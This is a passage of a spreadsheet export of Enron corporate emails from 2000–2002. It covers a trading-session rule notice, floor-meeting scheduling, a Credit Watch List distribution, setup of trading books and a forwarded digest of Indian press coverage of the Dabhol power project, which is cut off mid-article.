and good until cancelled (GTC) orders, will be deemed to have expired as of=_x000D_
=20_x000D_
the end of RTH for purposes of this End of Week Session.  Accordingly, in t=_x000D_
he=20_x000D_
event that a market participant with such an expired order seeks to=20_x000D_
participate in the End of Week Session, a new order must be submitted._x000D_
_x000D_
(D) Prices for trades executed during the End of Week Session shall  be=20_x000D_
reported on public ticker services;_x000D_
_x000D_
(E) Current market prices and trades executed during the End of Week Sessio=_x000D_
n=20_x000D_
shall not be considered in determining any settlement price; and_x000D_
_x000D_
(F) Floor Members executing trades during the End of Week Session shall mar=_x000D_
k=20_x000D_
a line across their trading cards prior to the entry of an End of Week=20_x000D_
Session trade._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=3Dtana.jones@enron.com&amp;=_x000D_
refdo_x000D_
c=3D(01-156)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 20:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'peggy.mccurley@enron.com'})</t>
  </si>
  <si>
    <t>RE: Suggestions for Floor Meeting Locations</t>
  </si>
  <si>
    <t>Hi Sally -_x000D_
_x000D_
Taking care of Philippe's emails while he's out.  Are there one or two floors that are occupied fully by your groups?  Please tell me the floors (probably two) where you would like the meetings and I will call Patti to coordinate your availability to attend.  I'll then send an email to your people notifying them of such.  _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Peggy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Beck, Sally  _x000D_
Sent:	Monday, April 09, 2001 11:54 AM_x000D_
To:	Philippe A Bibi/HOU/ECT@ENRON; Piper, Greg_x000D_
Subject:	Suggestions for Floor Meeting Locations_x000D_
_x000D_
The floors chosen for these meetings appear to be geared to the IT teams.  Between my operations teams dedicated to EA, EGM and EIM, I have roughly 500 employees in the Enron building.  Do you want all of them to choose one of the floors noted in your e-mail message, or would it be better to schedule one or two floor meetings in locations that more easily incorporate this segment of Net Works?  I have noted below the approximate number of employees per floor (including only those floors with a significant number of operations employees):  _x000D_
_x000D_
		29th Floor (trading)	67 employees		EGM risk, vol. mgmt., confirms, settlements and EIM risk _x000D_
_x000D_
		30th Floor (trading)	35 employees		EGM risk, confirms, settlements (various products) _x000D_
_x000D_
		31st Floor (trading)	52  employees		Power risk, confirms, vol. mgnt., settlements and DPR 										and MPR teams_x000D_
		_x000D_
		32nd Floor (trading)	117 employees		Gas risk, logistics (all regions), operational analysis_x000D_
_x000D_
				 _x000D_
		37th Floor			148 employees		Gas vol. mgmt., settlements, and global services 						_x000D_
Also, given the fact that operations is a relative "newcomer" to Enron Networks and yet represents a large number of employees in the group, I would be happy to work with you on remarks for all of the floor meetings to make it easier for you to be fully inclusive in these sessions.   --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 04/09/2001 10:30 AM ---------------------------_x000D_
    Office of the Chairman - Enron Net Works LLC_x000D_
_x000D_
_x000D_
From:	Office of the Chairman - Enron Net Works LLC@ENRON on 04/09/2001 10:13 AM_x000D_
Sent by:	Enron Announcements@ENRON_x000D_
To:	ENW-Employees_Houston_x000D_
cc:	 _x000D_
Subject:	Net Works Floor Meetings - DATES AND LOCATIONS HAVE CHANGED PLEASE READ_x000D_
_x000D_
We will be holding floor meetings on the following dates.  Please join us for a general overview and Q&amp;A session on one of the following floors:_x000D_
_x000D_
Tuesday, 4/17/01 - 2:00 - 3:00 p.m.		Location:  In front of EB2711	_x000D_
_x000D_
Wednesday, 4/25/01 - 2:00 - 3:00 p.m.	Location:  In front of EB2265_x000D_
_x000D_
Thursday, 4/26/01 - 2:00 - 3:00 p.m.		Location:  In front of EB2556_x000D_
_x000D_
Philippe &amp; Greg_x000D_
_x000D_
Please disregard the email sent on 4/6/01.  We apologize for any inconvenience._x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 02:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jim.schwieger@enron.com', 'susan.smith@enron.com', 'paul.choi@enron.com', 'steve.schneider@enron.com', 'kate.fraser@enron.com', 'souad.mahmassani@enron.com', 'james.barker@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'sylvia.pollan@enron.com', 'brad.coleman@enron.com', 'joseph.graham@enron.com', 'brad.mckay@enron.com', 'justin.rostant@enron.com', 'dan.mccairns@enron.com', 'lisa.csikos@enron.com', 'kristen.hanson@enron.com', 'jack.simunek@enron.com', 'ron.green@enron.com', 'melissa.graves@enron.com', 'larry.cash@enron.com', 'shonnie.daniel@enron.com', 'brad.horn@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harold.bertram@enron.com', 'susan.pereira@enron.com', 'alicia.jones@enron.com', 'debbie.brackett@enron.com', 'andrew.greer@enron.com', 'thomas.martin@enron.com', 'jane.tholt@enron.com', 'mary.smith@enron.com', 'steven.south@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'mary.cook@enron.com', 'nicole.cortez@enron.com', 'bob.shults@enron.com', 'marde.driscoll@enron.com', 'lucy.ortiz@enron.com', 'sandi.braband@enron.com', 'andrew.lewis@enron.com', 'julie.gomez@enron.com', 'sally.beck@enron.com', 'william.bradford@enron.com', 'edward.baughman@enron.com', 'geoff.storey@enron.com', 'gerald.lofton@enron.com', 'lauri.allen@enron.com', 'ned.higgins@enron.com', 'kim.theriot@enron.com', 'homer.lin@enron.com', 'michael.etringer@enron.com', 'andrea.ring@enron.com', 'jefferson.sorenson@enron.com', 'cheryl.marshall@enron.com', 'barbara.gray@enron.com', 'berney.aucoin@enron.com', 'craig.breslau@enron.com', 'gary.bryan@enron.com', 'cynthia.gin@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nichole.gunter@enron.com', 'david.parquet@enron.com', 'george.smith@enron.com', 'jennifer.fraser@enron.com', 'sandra.brawner@enron.com', 'steve.hooser@enron.com', 'lisa.gillette@enron.com', 'peter.keavey@enron.com', 'tammi.depaolis@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'teresa.mandola@enron.com', 'joanie.ngo@enron.com', 'jake.thomas@enron.com', 'david.eubanks@enron.com', 'jeffrey.austin@enron.com', 'patrick.hanse@enron.com', 'dick.jenkins@enron.com', 'lance.halgren@enron.com', 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'donald.black@enron.com', 'janet.dietrich@enron.com', 'katherine.herrera@enron.com', 'keith.holst@enron.com', 'george.gilbert@enron.com', 'kenneth.kaase@enron.com', 'peggy.banczak@enron.com', 'bryan.hull@enron.com', 'angie.collins@enron.com', 'steve.neal@enron.com', 'eric.gillaspie@enron.com', 'beth.perlman@enron.com', 'marc.horowitz@enron.com', 'kevin.bosse@enron.com', 'janelle.scheuer@enron.com', 'john.singer@enron.com', 'thresa.allen@enron.com', 'lee.papayoti@enron.com', 'stacy.dickson@enron.com', 'drew.hill@enron.com', 'brent.price@enron.com', 'mark.courtney@enron.com', 'robert.walker@enron.com', 'robert.cotten@enron.com', 'sheetal.patel@enron.com', 'james.ducote@enron.com', 'brian.riley@enron.com', 'cary.carrabine@enron.com', 'linda.ewing@enron.com', 'rebecca.ford@enron.com', 'nathan.hlavaty@enron.com', 'debra.perlingiere@enron.com', 'beth.cowan@enron.com', 'daniel.reck@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'bo.petersen@enron.com', 'mike.miller@enron.com', 'greg.mcclendon@enron.com', 'sheila.glover@enron.com', 'stuart.staley@enron.com', 'sunil.dalal@enron.com', 'kyle.lilly@enron.com', 'lisa.lees@enron.com', 'andrea.hauser@enron.com', 'ann.white@enron.com', 'suzy.robey@enron.com', 'kimberly.olinger@enron.com', 'adam.gross@enron.com', 'bob.schorr@enron.com', 'elizabeth.sager@enron.com', 'fred.lagrasta@enron.com', 'james.shirley@enron.com', 'winston.cheng@enron.com', 'john.grass@enron.com', 'tom.donohoe@enron.com', 'george.hope@enron.com', 'paul.lucci@enron.com', 'monica.roberts@enron.com', 'jung-suk.suh@enron.com', 'candace.bywaters@enron.com', 'kelly.lovvorn@enron.com', 'dianne.swiber@enron.com', 'tana.jones@enron.com', 'tina.valadez@enron.com', 'ragan.bond@enron.com', 'john.lavorato@enron.com', 'hunter.shively@enron.com', "brian.o'rourke@enron.com", 'carol.clair@enron.com', 'maureen.smith@enron.com', 'ray.hamman@enron.com', 'leslie.reeves@enron.com', 'greg.wolfe@enron.com', 'edward.gottlob@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Credit Watch List--8/21/00</t>
  </si>
  <si>
    <t xml:space="preserve">               Attached is a newly revised Credit Watch listing.  If there _x000D_
are any personnel in your group that were not included in this distribution, _x000D_
please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x5-7095, Brant Reves at x3-9897, Veronica Espinoza at x6-6002 or the _x000D_
Global Credit Hotline at x3-1803._x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Jan 2002 08:21:05 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: new books</t>
  </si>
  <si>
    <t>Two people will be setting curves for basis.  Keith Holst for CA curves and Frank Ermis for Rockies and Southwest curves. I will be setting curves for balance of the month._x000D_
_x000D_
Thanks,_x000D_
Mike_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Keiser, Kam  _x000D_
Sent:	Thursday, January 03, 2002 9:03 AM_x000D_
To:	Grigsby, Mike_x000D_
Subject:	new books_x000D_
_x000D_
Mike,_x000D_
_x000D_
We will be setting up both physical and financial books for everyone.  I know not everyone will have physical but to keep it consistent everyone will have both just in case.  I have the 10 names you sent Jeff earlier, please let me know if that changes.  Do you know what the structure going to look like? ie.  will each trader be assigned specific curves/locations, cash vs. term, how many different people will be setting curves._x000D_
_x000D_
We will be starting over with our curve files also.  We want to only start with the true published curves.  We have many derived/internal curves that aren't necessary and if we need to create more curves we will look into it later.  Since the number of curves will be greatly reduced, we will probably start with one file.    _x000D_
_x000D_
Thanks_x000D_
Kam_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Grigsby, Mike  _x000D_
Sent:	Wednesday, January 02, 2002 2:40 PM_x000D_
To:	Keiser, Kam_x000D_
Subject:	Zach McCarroll_x000D_
_x000D_
Can you get together with Zach on Thursday or Friday and walk him through a simple book.  Take Jane Tholt's book and discuss Risk 101._x000D_
_x000D_
_x000D_
Send him an email with a time and place._x000D_
_x000D_
Thanks,_x000D_
Mike</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 02:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>From The Enron India Newsdesk - May 5-7 newsclips</t>
  </si>
  <si>
    <t xml:space="preserve">Stinson/Vince,_x000D_
_x000D_
Some news articles.  Do read the first one, and the second last one._x000D_
_x000D_
Regards,_x000D_
Sandeep._x000D_
---------------------- Forwarded by Sandeep Kohli/ENRON_DEVELOPMENT on=20_x000D_
05/07/2001 09:10 AM ---------------------------_x000D_
_x000D_
_x000D_
Nikita Varma_x000D_
05/07/2001 07:42 AM_x000D_
To: Nikita Varma/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  (bcc: Sandeep Kohli/ENRON_DEVELOPMENT)_x000D_
_x000D_
Subject: From The Enron India Newsdesk - May 5-7 newsclips_x000D_
_x000D_
_x000D_
THE ECONOMIC TIMES, MAY 7, 2001_x000D_
http://www.economictimes.com/today/bn04.htm_x000D_
Enron CEO casts vote to save DPC, Tina Edwin &amp; Soma Banerjee=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, MAY 7, 2001_x000D_
http://www.economictimes.com/today/07econ10.htm_x000D_
Maha sore over delay in naming Godbole  nominee=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE TIMES OF INDIA, 7 May, 2001_x000D_
http://www.timesofindia.com/today/07busi3.htm_x000D_
Maharashtra 'unhappy' with delay in naming Godbole nominee=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
BUSINESS STANDARD, Monday, 7 May 2001_x000D_
http://www.business-standard.com/archives/2001/may/50050501.015.asp_x000D_
Reliance allowed to hawk power from Patalganga to third parties=20_x000D_
Arijit De, S Ravindran &amp; Renni Abraham in Mumbai_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, MAY 7, 2001_x000D_
http://www.economictimes.com/today/07econ11.htm_x000D_
No need of Patalganga, Bhadravati power: MSEB=20_x000D_
_x000D_
Also appeared in the following newspaper:_x000D_
THE TIMES OF INDIA, MAY 7, 2001_x000D_
'No need of Patalganga, Bhadravati power'=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
BUSINESS STANDARD, MAY 7, 2001_x000D_
http://www.business-standard.com/today/finance9.asp?Menu=3D5_x000D_
Global bankers ask govt to honour DPC  obligations=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
BUSINESS STANDARD_x000D_
Saturday, 5 May, 2001,=20_x000D_
http://www.business-standard.com/archives/2001/may/50050501.017.asp_x000D_
GE may pull out as DPC supplier , S Ravindran in Mumbai_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
HINDU BUSINESSLINE, May 5, 2001_x000D_
Agenda for fresh talks with Enron chalked out=20_x000D_
 http://www.indiaserver.com/businessline/2001/05/06/stories/14065607.htm_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, May 6, 2001_x000D_
http://216.34.146.167:8000/servlet/Form_x000D_
Godbole panel meets sans Dabhol representation=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, May 5, 2001_x000D_
http://216.34.146.167:8000/servlet/Form_x000D_
NTPC not to buy power from Enron: Govt_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE TIMES OF INDIA, May 7, 2001_x000D_
http://www.timesofindia.com/today/07busi11.htm_x000D_
MSEB recovers Rs 3.06 cr arrears in one day=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, MAY 7, 2001_x000D_
Enron CEO casts vote to save DPC, Tina Edwin &amp; Soma Banerjee=20_x000D_
=20_x000D_
AMUL'S creative directors may have gone back to ad-libbing 'Enron or=20_x000D_
Enr-off', but for the big kahuna at the American utility, Dabhol is still a=_x000D_
=20_x000D_
worthwhile project. While the entire Enron board had almost decided to call=_x000D_
=20_x000D_
it quits and proceed with the termination of the $2.9-billion  power projec=_x000D_
t=20_x000D_
at Dabhol, the veto exercised by the  company chairman Kenneth Lay has save=_x000D_
d=20_x000D_
the project =01*- at least for the timebeing. Sources said the meeting held=_x000D_
 on=20_x000D_
Tuesday at the energy major's headquarters in Houston could have sounded th=_x000D_
e=20_x000D_
death knell for the only big foreign investment in the Indian power sector.=_x000D_
=20_x000D_
_x000D_
Although the future of the project is still pretty uncertain with the lende=_x000D_
rs=20_x000D_
unwilling to continue disbursements unless payment obligations are not=20_x000D_
honoured and contractual obligations left unfulfilled, the veto exercised a=_x000D_
t=20_x000D_
this juncture by the chairman of the parent company has come as a big boost=_x000D_
=20_x000D_
to the Indian venture. Company sources said: "We do not know what went on =_x000D_
=20_x000D_
there but it is true that as of now we are not pulling out."  With the=20_x000D_
engineering procurement and construction contractors GE and equipment=20_x000D_
suppliers Bechtel too in a  cautious mode mode, DPC was finding it even mor=_x000D_
e=20_x000D_
difficult to continue the construction of the project as per the schedules.=_x000D_
=20_x000D_
Sources said the stand taken by the rest of the directors on the board woul=_x000D_
d=20_x000D_
be in view of the backlash that the company would have to face from its=20_x000D_
shareholders if the  project actually flopped.Enron had similar bitter=20_x000D_
experiences in Pakistan and it was difficult for the parent company to then=_x000D_
=20_x000D_
justify such investments to the shareholders.=20_x000D_
_x000D_
Enron, which had planned a major investments in India's infrastructure=20_x000D_
sectors such as oil and gas, LNG, gas transportation, telecom and broadband=_x000D_
=20_x000D_
network, has already pulled out most of their personnel from some of these=_x000D_
=20_x000D_
operations. The company's MoUs with various other majors like Indian Oil=20_x000D_
Corporation, too, is in a limbo and the US major's stake in the oil and gas=_x000D_
=20_x000D_
venture is up for grabs. However, even though Lay is still hoping to find a=_x000D_
=20_x000D_
solution  to the controversy back home, both DPC and MSEB are still to get=_x000D_
=20_x000D_
down to negotiations._x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, MAY 7, 2001_x000D_
Maha sore over delay in naming Godbole  nominee=20_x000D_
_x000D_
THE MAHARASHTRA government has expressed 'unhappiness' over the Centre's=20_x000D_
delay in appointing its nominee on the nine-member Godbole Committee to =20_x000D_
renegotiate the power purchase agreement signed between  Enron-promoted=20_x000D_
Dabhol Power Company and state   electricity board. "The committee, which i=_x000D_
s=20_x000D_
to hold discussions with Enron  officials from Houston on May 11, has only =_x000D_
a=20_x000D_
month's time  for renegotiations and with DPC's termination notice threat =_x000D_
=20_x000D_
hanging on our head, time is actually running out. Yet  there is no officia=_x000D_
l=20_x000D_
to represent the Union government," said  a senior state government officia=_x000D_
l.=20_x000D_
"There are media reports that the solicitor-general Harish  Salve would be=_x000D_
=20_x000D_
appointed, but we are yet to hear anything   from their side," he said.=20_x000D_
_x000D_
The official said the state expected Centre to announce its  representative=_x000D_
=20_x000D_
before May 11, as it would appreciate his  crucial presence in the first=20_x000D_
session of discussions with  Enron officials, lenders and gas suppliers.=20_x000D_
Sources in the mantralaya added the government had also   been unhappy over=_x000D_
=20_x000D_
the Centre's "rigid stand" on not allowing State-owned National Thermal Pow=_x000D_
er=20_x000D_
Corporation   to buy the excess capacity of DPC's total 2,184-mw  project.=_x000D_
=20_x000D_
"Let NTPC and Power Trading Corporation of India come together and sell DPC=_x000D_
's=20_x000D_
surlpus power. We have already mooted this suggestion, but a favourable rep=_x000D_
ly=20_x000D_
is yet to  come from the union power ministry," the official said.=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE TIMES OF INDIA, 7 May, 2001_x000D_
Maharashtra 'unhappy' with delay in naming Godbole nominee=20_x000D_
_x000D_
 The Maharashtra government has expressed 'unhappiness' over the Centre's=_x000D_
=20_x000D_
delay in appointing its   nominee on the nine-member Godbole committee to=_x000D_
=20_x000D_
renegotiate the power purchase agreement (PPA) signed between Enron promote=_x000D_
d=20_x000D_
Dabhol Power Company  (DPC) and the Maharashtra State Electricity Board =20_x000D_
(MSEB). "The committee, which is to hold discussions with Enron officials=_x000D_
=20_x000D_
from Houston on May 11, has only a month's  time for renegotiations and wit=_x000D_
h=20_x000D_
DPC's termination notice threat hanging on our head, time is actually runni=_x000D_
ng=20_x000D_
out. Yet there is no official to represent the Union government," a senior=_x000D_
=20_x000D_
state government official said here on Sunday. "There are media reports tha=_x000D_
t=20_x000D_
solicitor general Harish   Salve would be appointed, but we are yet to hear=_x000D_
=20_x000D_
anything from their side," he said.=20_x000D_
_x000D_
The official said that the state expected the Centre to announce their=20_x000D_
representative before May 11, as it would appreciate his crucial presence i=_x000D_
n=20_x000D_
the first session of discussions with Enron officials, lenders and gas=20_x000D_
suppliers. Sources in the Mantralaya added that the government had also bee=_x000D_
n=20_x000D_
unhappy over the Centre's rigid stand on  not allowing state-owned National=_x000D_
=20_x000D_
Thermal Power Corporation (NTPC) to buy the excess capacity of DPC's total=_x000D_
=20_x000D_
2,184 mw project. "Let NTPC and Power Trading Corporation of India (PTC) co=_x000D_
me=20_x000D_
together and sell DPC's surlpus power. We have already mooted this=20_x000D_
suggestion, but a favourable reply is yet to come from the Union power=20_x000D_
ministry," the official said. The official said that the Centre, which was=_x000D_
=20_x000D_
also responsible for DPC project as it has provided counter guarantee to=20_x000D_
Enron India, should form a special purpose  vehicle for sale of the excess=_x000D_
=20_x000D_
power to other states. The state government's reaction comes in wake of Uni=_x000D_
on=20_x000D_
power minister Suresh Prabhu's discussion with Chief Minister Vilasrao=20_x000D_
Deshmukh in Delhi few days ago. It was learnt that Prabhu told Deshmukh=20_x000D_
"there is no question of NTPC buying power from the project since long term=_x000D_
=20_x000D_
PPAs have been signed by NTPC with the buying states".=20_x000D_
_x000D_
Deshmukh had suggested that the Central power utility should sell excess=20_x000D_
power over and above the 300-400 mw needed for the state from the DPC's 740=_x000D_
=20_x000D_
mw  phase-I and soon to be commissioned phase-II of 1,444  mw, to other nee=_x000D_
dy=20_x000D_
states. Considering the high cost of power generated from DPC,   which duri=_x000D_
ng=20_x000D_
the recent months has hovered around Rs 7 per unit as against an average co=_x000D_
st=20_x000D_
of Rs 2.30-2.80 a unit  from Central and state utilities, there would be fe=_x000D_
w=20_x000D_
takers for the power from Dabhol, the power minister  reportedly said.=20_x000D_
"Deficit states will buy DPC power only when the cost of  power is brought=_x000D_
=20_x000D_
down," he said, adding power ministry  would facilitate wheelng of this pow=_x000D_
er=20_x000D_
to the buyers._x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
BUSINESS STANDARD, Monday, 7 May 2001_x000D_
Reliance allowed to hawk power from Patalganga to third parties=20_x000D_
Arijit De, S Ravindran &amp; Renni Abraham in Mumbai_x000D_
_x000D_
 In an unusual departure from normal practice, the Maharashtra government h=_x000D_
as=20_x000D_
allowed the Reliance  group to sell power generated by its 447-mw  Patalgan=_x000D_
ga=20_x000D_
power project directly to third parties if   the Maharashtra State=20_x000D_
Electricity Board (MSEB)  does not lift power. The project=01,s power purch=_x000D_
ase=20_x000D_
agreement (PPA) has a clause to this effect.  The state government=01,s=20_x000D_
permission to Reliance to  hawk power to third parties has to be seen in th=_x000D_
e=20_x000D_
context of its dithering on forwarding to the Centre  the Dabhol Power=20_x000D_
Company=01,s bid for mega power  status so that it could sell power to thir=_x000D_
d=20_x000D_
parties.=20_x000D_
_x000D_
 DPC sources told Business Standard several weeks ago that the company=01,s=_x000D_
=20_x000D_
application had been pending with the Chief Minister=01,s office for months=_x000D_
.=20_x000D_
Only now has the state government authorised the Godbole committee to=20_x000D_
negotiate with DPC on third  party sales outside the state. The DPC project=_x000D_
=20_x000D_
is facing the threat of closure  following MSEB=01,s inability to buy power=_x000D_
 from=20_x000D_
it,  thanks to the Board=01,s weak financial position.  Not only can the=20_x000D_
Reliance group sell power to third parties within Maharashtra, but it can=_x000D_
=20_x000D_
sell power to utilities outside the state. The PPA does not  expressly bar =_x000D_
it=20_x000D_
from doing so. Nor does it specify the category of customers to whom power=_x000D_
=20_x000D_
can be sold. So, in effect, this suggests that the group could sell power t=_x000D_
o =20_x000D_
industrial and commercial customers in  Maharashtra and emerge as a rival t=_x000D_
o=20_x000D_
the MSEB.The state electricity board derives over 80 per cent  of its reven=_x000D_
ue=20_x000D_
from such consumers.=20_x000D_
_x000D_
 Apart from captive power plants, independent power producers in India are=_x000D_
=20_x000D_
allowed to sell power only to  state electricity boards. They can sell powe=_x000D_
r =20_x000D_
outside the state only if they qualify for mega power project status.  With=_x000D_
=20_x000D_
its 447-mw capacity, the Patalganga project is not eligible for such status=_x000D_
=20_x000D_
because mega power  rojects are supposed to have a minimum capacity  of 1,0=_x000D_
00=20_x000D_
mw. Speaking on the sidelines of a press conference  last week, Reliance=20_x000D_
Industries managing director  Anil Ambani told Business Standard: A provisi=_x000D_
on=20_x000D_
in third parties. Ambani was answering a question on whether the MSEB=01,s =_x000D_
weak=20_x000D_
financials and inability to offer escrow cover to the project as emphasised=_x000D_
=20_x000D_
in the Godbole committee report set up to defuse the Dabhol crisis would=20_x000D_
derail the Patalganga project.=20_x000D_
_x000D_
The PPA does not have any express restriction as to third party sale outsid=_x000D_
e=20_x000D_
the state, a Reliance spokesperson confirmed on Friday in a faxed  response=_x000D_
=20_x000D_
to questions.  A senior MSEB official explained that the state government=_x000D_
=20_x000D_
cleared private power projects some years ago on the basis of the=20_x000D_
unrealistically high demand projections contained in a report by a former=_x000D_
=20_x000D_
MSEB official.  Subsequently, it was realised that the state would be stuck=_x000D_
=20_x000D_
with excess power. So the Reliance group was permitted to sell power to thi=_x000D_
rd=20_x000D_
parties, he said. The Patalganga project along with the Ispat group=01,s 1,=_x000D_
082=20_x000D_
mw Bhadravati project has been put on hold till the Godbole committee submi=_x000D_
ts=20_x000D_
its second=20_x000D_
report._x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, MAY 7, 2001_x000D_
No need of Patalganga, Bhadravati power: MSEB=20_x000D_
_x000D_
THE AXE seems to have finally fallen on the much-delayed Reliance=20_x000D_
Industries-promoted Patalganga and Ispat Industries' Bhadravati Power=20_x000D_
projects in Maharashtra as  the state electricity board has firmly told the=_x000D_
=20_x000D_
government  that "there is no need of these projects nor their power". The=_x000D_
=20_x000D_
loss-making board has communicated to the government that MSEB had "no=20_x000D_
interest" in Patalganga and Bhadravati, as it did not have escrow-able=20_x000D_
capacity and also that industrial demand for power had slowed down  =20_x000D_
tremendously in Maharashtra, state government sources  said here on Sunday.=_x000D_
=20_x000D_
"In last November itself, MSEB had sent an official intimation to the state=_x000D_
=20_x000D_
government informing its decision in  favour of cancellation of the two=20_x000D_
projects on several grounds -- including they being unviable and=20_x000D_
unaffordable," sources said. "Reliance's project is no different from that =_x000D_
of=20_x000D_
DPC's. Patalganga is also naphtha-based and its PPA is on similar lines...=_x000D_
=20_x000D_
_x000D_
After the Enron experience, MSEB cannot  even dream of another gas-based=20_x000D_
power plant in the state," a senior MSEB official said. He said MSEB has=20_x000D_
already asked the state government  not to provide escrow to both the 447-m=_x000D_
w=20_x000D_
Patalganga and  the 1,084-mw coal-based Bhadravati, "as the US energy major=_x000D_
=20_x000D_
has almost squeezed us of all over finances". When contacted, MSEB chairman=_x000D_
=20_x000D_
Vinay Bansal said: "Reliance and Ispat projects have been put on hold as pe=_x000D_
r =20_x000D_
the Godbole Committee's recommendations", but  expressed inability to give=_x000D_
=20_x000D_
further details.=20_x000D_
_x000D_
Currently, Bhadravati and Patalganga projects have been  put on hold as per=_x000D_
=20_x000D_
Godbole Committee report, which was set up to review the DPC-MSEB PPA and=_x000D_
=20_x000D_
energy scenario in Maharashtra. "Can you go ahead with the project without =_x000D_
an=20_x000D_
escrow cover?" the committee was believed to have asked Ispat  and Reliance=_x000D_
=20_x000D_
representatives, to which the reply had been  negative, sources added.=20_x000D_
Sources said, as of now, both the projects have not been able to achieve=20_x000D_
financial closure as leading financial   institutions were not willing to=_x000D_
=20_x000D_
fund the projects which do  not have a "guaranteed payment" mechanism from=_x000D_
=20_x000D_
MSEB, which, incidentally it has promised to DPC. "All the three were clear=_x000D_
ed=20_x000D_
as 'fast-track' projects, but other than Enron, Reliance and Ispat have bee=_x000D_
n=20_x000D_
caught in a quagmire, especially Bhadravati, which has been hanging afire=_x000D_
=20_x000D_
since last nine years," they added.=20_x000D_
_x000D_
Moreover, the MSEB official opined that given the current situation, if DPC=_x000D_
=20_x000D_
calls it quits from India, Bhadravati was a safer bet than Reliance's=20_x000D_
Patalganga. Patalganga's power would be mere 50 paise less than that of DPC=_x000D_
's=20_x000D_
that ranges anywhere around approximately Rs  4.50 per unit to as high as R=_x000D_
s=20_x000D_
7, while Bhadravati's cost could be around Rs 3.80 to Rs 4 per unit, he=20_x000D_
informed. MSEB's installed capacity ended on March 31, 2001, was14,000 mw a=_x000D_
nd=20_x000D_
it has generated 45,000 million units with transmission and distribution=20_x000D_
losses as high as 39 per cent. (PTI)_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
BUSINESS STANDARD, MAY 7, 2001_x000D_
Global bankers ask govt to honour DPC  obligations=20_x000D_
_x000D_
Tamal Bandyopadhyay, Surajeet Dasgupta&amp; Santosh Tiwary in Mumbai/NewDelhi=_x000D_
=20_x000D_
Global arrangers for the Dabhol Power Company have mounted fresh pressure o=_x000D_
n=20_x000D_
the  finance ministry to honour the Union  government=01,s counter-guarante=_x000D_
e and=20_x000D_
have also  set strict conditions for reconsidering the termination of the=_x000D_
=20_x000D_
power purchase agreement (PPA) between the DPC and the Maharashtra State=20_x000D_
Electricity Board (MSEB). In a related development, the DPC has sent a  not=_x000D_
e=20_x000D_
to all lenders saying they would have to bear   the consequences of the tur=_x000D_
n=20_x000D_
of events as they  have prevented the DPC from serving the PPA  termination=_x000D_
=20_x000D_
notice last month.=20_x000D_
_x000D_
The lenders. in their turn, sent a statement --  prepared by the New=20_x000D_
